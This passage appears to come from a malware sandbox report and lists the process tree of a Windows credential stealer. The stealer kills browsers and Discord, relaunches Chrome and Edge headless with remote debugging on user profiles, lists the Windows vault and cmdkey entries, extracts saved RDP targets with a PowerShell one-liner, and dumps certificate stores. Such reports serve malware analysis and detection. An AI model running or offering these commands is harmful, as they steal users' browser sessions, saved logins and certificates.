                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                8⤵
                                                  PID:5436
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM chrome.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1812
                                              • C:\Windows\system32\tasklist.exe
                                                "tasklist"
                                                7⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4724
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM msedge.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2404
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM brave.exe
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2068
                                              • C:\Windows\system32\tasklist.exe
                                                "tasklist"
                                                7⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:6096
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM opera.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5604
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM vivaldi.exe
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1656
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM chrome.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1752
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM firefox.exe
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2780
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM Discord.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5360
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM dragon.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1952
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM DiscordCanary.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5892
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM maxthon.exe
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5856
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM DiscordPTB.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4736
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM uc_browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2700
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM DiscordDevelopment.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4580
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM slimjet.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5236
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM cent_browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4684
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM epic.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5716
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM torch.exe
                                                7⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:912
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM whale.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5948
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM 360browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5500
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM qqbrowser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3728
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /IM browser.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:5780
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM chrome.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:1184
                                              • C:\Windows\system32\taskkill.exe
                                                "taskkill" /F /IM msedge.exe
                                                7⤵
                                                  PID:5576
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM brave.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:3780
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM opera.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:2260
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM vivaldi.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:1540
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM firefox.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:4508
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM dragon.exe
                                                  7⤵
                                                    PID:6040
                                                  • C:\Windows\system32\taskkill.exe
                                                    "taskkill" /F /IM maxthon.exe
                                                    7⤵
                                                    • Kills process with taskkill
                                                    PID:4156
                                                  • C:\Windows\system32\taskkill.exe
                                                    "taskkill" /F /IM uc_browser.exe
                                                    7⤵
                                                      PID:1612
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM slimjet.exe
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:2412
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM cent_browser.exe
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:3856
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM epic.exe
                                                      7⤵
                                                      • Kills process with taskkill
                                                      PID:3036
                                                    • C:\Windows\system32\taskkill.exe
                                                      "taskkill" /F /IM torch.exe
                                                      7⤵
                                                        PID:2112
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:2780
                                                        • C:\Windows\system32\taskkill.exe
                                                          "taskkill" /F /IM whale.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:532
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                              PID:5360
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /F /IM 360browser.exe
                                                            7⤵
                                                              PID:4260
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                8⤵
                                                                  PID:1952
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /F /IM qqbrowser.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:2924
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /F /IM browser.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:3896
                                                              • C:\Windows\system32\tasklist.exe
                                                                "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                                7⤵
                                                                • Enumerates processes with tasklist
                                                                PID:3820
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=41060 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                                7⤵
                                                                • Uses browser remote debugging
                                                                • Checks processor information in registry
                                                                • Enumerates system info in registry
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:1352
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd493cdcf8,0x7ffd493cdd04,0x7ffd493cdd10
                                                                  8⤵
                                                                    PID:4492
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2656,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2652 /prefetch:2
                                                                    8⤵
                                                                    • Modifies registry class
                                                                    PID:5176
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2000,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2516 /prefetch:3
                                                                    8⤵
                                                                      PID:4872
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2700,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2688 /prefetch:8
                                                                      8⤵
                                                                        PID:4708
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2924,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2920 /prefetch:1
                                                                        8⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3060
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2996,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2988 /prefetch:1
                                                                        8⤵
                                                                        • Uses browser remote debugging
                                                                        PID:5024
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=41060 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3964,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3916 /prefetch:1
                                                                        8⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3460
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4468,i,13982281161623883909,8473663800913260070,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4460 /prefetch:8
                                                                        8⤵
                                                                          PID:2160
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                                        7⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:3608
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /F /IM chrome.exe
                                                                        7⤵
                                                                        • Kills process with taskkill
                                                                        PID:4692
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                        7⤵
                                                                        • Enumerates processes with tasklist
                                                                        PID:4508
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=42816 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                                        7⤵
                                                                        • Uses browser remote debugging
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        • Modifies data under HKEY_USERS
                                                                        • Modifies registry class
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:1944
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x230,0x234,0x238,0x22c,0x258,0x7ffd493af208,0x7ffd493af214,0x7ffd493af220
                                                                          8⤵
                                                                            PID:2160
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2584,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:2
                                                                            8⤵
                                                                            • Modifies registry class
                                                                            PID:5332
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2836,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:3
                                                                            8⤵
                                                                              PID:2756
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2880,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2888 /prefetch:8
                                                                              8⤵
                                                                                PID:4552
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42816 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3332,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:1
                                                                                8⤵
                                                                                • Uses browser remote debugging
                                                                                PID:3628
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42816 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3060,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                8⤵
                                                                                • Uses browser remote debugging
                                                                                PID:4820
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4892,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:8
                                                                                8⤵
                                                                                  PID:528
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4992,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:8
                                                                                  8⤵
                                                                                    PID:4612
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5100,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:8
                                                                                    8⤵
                                                                                      PID:1280
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5100,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:8
                                                                                      8⤵
                                                                                        PID:216
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                                      7⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:3856
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      "taskkill" /F /IM msedge.exe
                                                                                      7⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:6032
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      "taskkill" /IM chrome.exe
                                                                                      7⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5736
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      "taskkill" /IM msedge.exe
                                                                                      7⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5536
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      "taskkill" /IM brave.exe
                                                                                      7⤵
                                                                                        PID:5500
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM opera.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:716
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM vivaldi.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2172
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM firefox.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2412
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM dragon.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4708
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM maxthon.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4308
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM uc_browser.exe
                                                                                        7⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:1072
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        "taskkill" /IM slimjet.exe
                                                                                        7⤵
                                                                                          PID:5088
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          "taskkill" /IM cent_browser.exe
                                                                                          7⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:2404
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          "taskkill" /IM epic.exe
                                                                                          7⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:1704
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          "taskkill" /IM torch.exe
                                                                                          7⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:2584
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            8⤵
                                                                                              PID:3856
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            "taskkill" /IM whale.exe
                                                                                            7⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:2552
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            "taskkill" /IM 360browser.exe
                                                                                            7⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:5856
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            "taskkill" /IM qqbrowser.exe
                                                                                            7⤵
                                                                                              PID:436
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              "taskkill" /IM browser.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:3688
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              "taskkill" /F /IM chrome.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5652
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              "taskkill" /F /IM msedge.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:3108
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              "taskkill" /F /IM brave.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4836
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              "taskkill" /F /IM opera.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5020
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              "taskkill" /F /IM vivaldi.exe
                                                                                              7⤵
                                                                                                PID:1936
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                "taskkill" /F /IM firefox.exe
                                                                                                7⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:4040
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                "taskkill" /F /IM dragon.exe
                                                                                                7⤵
                                                                                                  PID:4764
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM maxthon.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:3608
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM uc_browser.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:3484
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM slimjet.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4988
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM cent_browser.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:5508
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM epic.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4712
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM torch.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:3648
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM whale.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4804
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM 360browser.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4564
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM qqbrowser.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4872
                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                  "taskkill" /F /IM browser.exe
                                                                                                  7⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4908
                                                                                                • C:\Windows\system32\vaultcmd.exe
                                                                                                  "vaultcmd" /list
                                                                                                  7⤵
                                                                                                    PID:2828
                                                                                                  • C:\Windows\system32\cmdkey.exe
                                                                                                    "cmdkey" /list
                                                                                                    7⤵
                                                                                                      PID:5632
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                                      7⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:5316
                                                                                                      • C:\Windows\system32\cmdkey.exe
                                                                                                        "C:\Windows\system32\cmdkey.exe" /list
                                                                                                        8⤵
                                                                                                          PID:3036
                                                                                                      • C:\Windows\system32\certutil.exe
                                                                                                        "certutil" -store My
                                                                                                        7⤵
                                                                                                          PID:380
                                                                                                        • C:\Windows\system32\certutil.exe
                                                                                                          "certutil" -store -user My
                                                                                                          7⤵
